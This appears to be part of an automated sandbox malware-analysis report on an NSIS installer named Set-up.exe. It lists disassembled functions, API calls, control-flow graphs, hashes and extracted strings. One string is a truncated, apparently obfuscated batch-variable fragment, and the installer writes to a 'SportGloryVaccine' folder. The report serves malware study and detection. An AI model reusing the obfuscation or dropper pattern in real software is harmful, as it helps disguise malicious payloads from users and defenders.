                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 608394941-2746725676
                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                      Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • lstrcatW.KERNEL32(00000000,00000000,SportGloryVaccine,004D70B0,00000000,00000000), ref: 00401A76
                                      • CompareFileTime.KERNEL32(-00000014,?,SportGloryVaccine,SportGloryVaccine,00000000,00000000,SportGloryVaccine,004D70B0,00000000,00000000), ref: 00401AA0
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426EE3,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SportGloryVaccine
                                      • API String ID: 4286501637-3378306790
                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                      Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004035C4
                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                      Strings
                                      • soft, xrefs: 004036A1
                                      • Error launching installer, xrefs: 00403603
                                      • Null, xrefs: 004036AA
                                      • Inst, xrefs: 00403698
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 4283519449-527102705
                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                      Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004033F1
                                      • GetTickCount.KERNEL32 ref: 00403492
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                      • wsprintfW.USER32 ref: 004034CE
                                      • WriteFile.KERNELBASE(00000000,00000000,00426EE3,00403792,00000000), ref: 004034FF
                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                      Strings
                                      • Set Broadcasting=SjBjtOperation-Charles-Categories-Investigators-Dates-Video-Agency-Accurately-Changed-NPZiVe-xFfsDiscussion-Whale-Continued-Tanks-Fool-LTBox-Scripts-Enabling-Clearance-Amplifier-Rick-MEqReligious-Judges-Set Joint=yEiVariations-Fo, xrefs: 004033FD
                                      • pAB, xrefs: 004033AB
                                      • ... %d%%, xrefs: 004034C8
                                      • nB, xrefs: 0040346F, 0040348A, 00403513
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CountFileTickWrite$wsprintf
                                      • String ID: ... %d%%$Set Broadcasting=SjBjtOperation-Charles-Categories-Investigators-Dates-Video-Agency-Accurately-Changed-NPZiVe-xFfsDiscussion-Whale-Continued-Tanks-Fool-LTBox-Scripts-Enabling-Clearance-Amplifier-Rick-MEqReligious-Judges-Set Joint=yEiVariations-Fo$pAB$nB
                                      • API String ID: 651206458-3385882860
                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                      Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                      APIs
                                      • lstrlenW.KERNEL32(00445D80,00426EE3,74DF23A0,00000000), ref: 00404FD6
                                      • lstrlenW.KERNEL32(004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FE6
                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FF9
                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426EE3,74DF23A0,00000000), ref: 00406902
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                      • String ID:
                                      • API String ID: 2740478559-0
                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                      Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                      APIs
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringWritelstrcpyn
                                      • String ID: <RM>$SportGloryVaccine$WriteINIStr: wrote [%s] %s=%s in %s
                                      • API String ID: 247603264-2582855367
                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                      Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                      APIs
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426EE3,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                      • API String ID: 3156913733-2180253247
                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                      Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: nsa
                                      • API String ID: 1716503409-2209301699
                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                      Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                      APIs
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
